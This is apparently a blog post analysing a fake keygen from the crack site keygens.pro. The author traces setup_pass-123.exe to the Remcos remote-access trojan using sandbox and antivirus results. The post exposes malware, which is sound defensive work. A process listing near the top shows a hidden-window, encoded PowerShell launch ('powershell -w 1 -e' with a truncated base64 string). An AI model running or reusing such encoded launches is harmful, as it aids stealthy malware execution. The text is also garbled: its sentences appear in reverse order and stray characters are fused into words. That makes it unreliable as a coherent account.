Lsass.exe 2992 C:\Windows\system32\lsass.exe Services.exe 484 C:\Windows\system32\services.exe Powershell.exe 764 powershell -w 1 -e cwB0AGEAcgB0AC0A
I've sent the file to my capev2 ( like cuckoo sandbox but with python3) who also identified it as remcos, and even exactly version 2.7.0 Pro. The file in question is identified massively as 'remcos' (avira, kaspersky, f-secure.) remcos is a know trojan, and this time they have right. If we try to download some other random files from the keygens.pro collection, sometime we have variations.Į.g: .keygen-URET hxtps://keygens.pro/crack/733508/ who contain a 'readme.txt' but we still have our suspicious setup_pass-123.exe inside.Īntiviruses aren't really happy about the file when sent to virustotal, but hey, it's kind of normal it's a crack afterall. The archive is password protected and contain only one file "setup_pass-123.exe" Lol description on the page, didn't know reagan was from snd and born in russiaĪnyway we got redirected on a download page after clicking 'Download only Keygen' button, we have to fill a captcha and agree to the conditions So let's pick something, i don't know, maybe .1.1.keygen-SND hxtps://keygens.pro/crack/729775/ Super, looks like there a lot of cracks over here! and the site is virus free, right? So you want to download some releases from snd? alright let's see at, the distribution section menu contain a link pointing at hxtps://keygens.pro/
0 kommentar(er)
